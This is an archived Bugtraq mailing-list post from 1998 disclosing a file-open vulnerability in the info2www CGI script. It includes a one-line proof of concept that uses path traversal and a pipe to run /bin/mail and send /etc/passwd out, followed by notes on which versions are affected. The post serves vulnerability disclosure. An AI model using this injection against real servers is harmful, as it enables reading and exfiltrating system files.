Bugtraq mailing list archives
Vulnerabilites in some versions of info2www CGI
From: njs3 () DOC IC AC UK (Niall Smart)
Date: Tue, 3 Mar 1998 11:26:49 +0000
Hi, Some versions of the info2www CGI blindly open files: $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passw d|)' $ You have new mail. $ Trying to track down which versions of info2www have this bug and which don't has been difficult, there are lots of variants out there, some of which aren't vulnerable. Instead of trying to make a list of versions which are vulnerable I'll just say that: - if it has no version number, its probably vulnerable - the uuencoded version at CPAN is corrupt, and the one which the README file tells you to get is vulnerable - version 1.1 is vulnerable - version 1.2.x seem ok (but I'm no perl expert) Apparently info2www is based on info2html and infogate, so these may have problems too. Niall
Current thread:
- Re: strcpy versus strncpy, (continued)
- Re: strcpy versus strncpy Daniel Reed (Mar 02)
- Re: strcpy versus strncpy Kragen (Mar 03)
- Re: strcpy versus strncpy Wietse Venema (Mar 03)
- Re: strcpy versus strncpy pedward () WEBCOM COM (Mar 03)
- Re: strcpy versus strncpy Kragen (Mar 03)
- Re: strcpy versus strncpy Aleph One (Mar 02)
- Re: strcpy versus strncpy sinster () DARKWATER COM (Mar 02)
- Re: strcpy versus strncpy Nick Maclaren (Mar 03)
- Re: strcpy versus strncpy Mark Walker (Mar 03)
- updatedb: sort patch Michael Ballbach (Mar 02)
- Re: strcpy versus strncpy Eivind Eklund (Mar 03)
- Vulnerabilites in some versions of info2www CGI Niall Smart (Mar 03)
- Universal Wrapper Willy TARREAU (Mar 03)
- Re: strcpy versus strncpy Victor Lavrenko (Mar 03)
- Re: strcpy versus strncpy Chris L. Mason (Mar 03)
- Re: strcpy versus strncpy Mark Whitis (Mar 04)
- Re: strcpy versus strncpy Andy Church (Mar 02)
- Re: strcpy versus strncpy Edwin Li-Kai Liu (Mar 03)
- Re: strcpy versus strncpy Ben Laurie (Mar 03)
- Re: strcpy versus strncpy Chris L. Mason (Mar 03)
- Re: strcpy versus strncpy der Mouse (Mar 04)
- Re: strcpy versus strncpy Aleph One (Mar 04)
(Thread continues...)
- Re: strcpy versus strncpy Daniel Reed (Mar 02)